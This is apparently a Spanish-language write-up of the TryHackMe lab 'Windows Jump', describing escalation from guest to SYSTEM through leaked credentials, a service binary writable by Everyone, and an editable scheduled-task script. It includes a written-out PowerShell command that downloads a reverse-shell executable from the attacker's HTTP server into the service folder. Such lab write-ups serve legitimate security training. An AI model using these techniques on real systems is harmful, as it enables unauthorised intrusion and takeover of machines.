XUT_ / MACHINES / THM

0086

Windows Jump

THMMACHINENONEMEDIUM

Introduction

windows-jump

Usa la escalada de privilegios en Windows para saltar de guest a SYSTEM.

Un escaneo de vulnerabilidades rutinario destacó una máquina Windows en la red interna; nada alarmante en la superficie, simplemente una sóla estación de trabajo dejada atrás tras una ronda de despidos. IT nunca limpió la máquina debidamente. Tu trabajo es descubrir cómo de malo es. TU objetivo es escalar desde guest hasta SYSTEM:

guest --> thmuser --> notadmin --> svcadmin --> SYSTEM

Getting the Flags

Reconocimiento Inicial

Comenzamos escaneando los puertos abiertos.

windows-jump

Ahora vamos a escanear dichos puertos más en profundidad.


Profundización

Vamos a listar SMB a ver qué encontramos.

windows-jump

Parece que hay un archivo por lo que lo descargamos y vamos a leerlo.

windows-jump

Parece que hemos encontrado la contraseña del primer usuario. Vamos a iniciar sesión con él.

windows-jump

Y así obtenemos una consola dimensionable.


Explotación

Vamos a investigar un poco. Yendo a mirar en C:\Users\thmuser\Desktop nos encontramos con la primera flag.

windows-jump

Vamos a intentar escalar.

Exposed Saved Credentials

windows-jump

Con esta contraseña podemos cambiar de sesión.

windows-jump

Vamos a buscar la flag.


Movimiento Lateral

Service Abuse

Si investigamos los servicios, podemos ver lo siguiente:

windows-jump

Aquí podemos ver que el servicio THMSvc corre bajo la cuenta de svcadmin, y con icacls podemos ver que todo el mundo (Everyone) tiene control completo (F). Podemos usarlo para obtener una reverse shell de la siguiente manera.

windows-jump

Creamos una backdoor en formato exe para windows y abrimos un servidor HTTP para descargarlo desde PowerShell:

windows-jump

powershell
Invoke-WebRequest -Uri http://IP:8000/rev-svc.exe -OutFile C:\Windows\THMSVC\svc.exe

Una vez copiada la shell, vamos a dar acceso total a todo el mundo con icacls:

windows-jump

Ahora empezamos un listener en nuestra máquina y arrancamos el servicio.

windows-jump

Una vez aquí, somos svcadmin. Buscamos la flag.


Escalada de Privilegios

Abusando las Tareas Programadas

Si miramos las tareas programadas encontramos cleanup.bat.

windows-jump

Esto es peligroso porque svcadmin puede editar los contenidos de un archivo que se ejecuta con permisos SYSTEM.

Para hacerlo primero creamos el payload.

windows-jump

Ahora lo descargamos desde PowerShell.

windows-jump

Vamos a editar el archivo para que ejecute el payload.

windows-jump

Ahora esperamos la ejecución del archivo.

windows-jump

Vamos a buscar la última flag.

windows-jump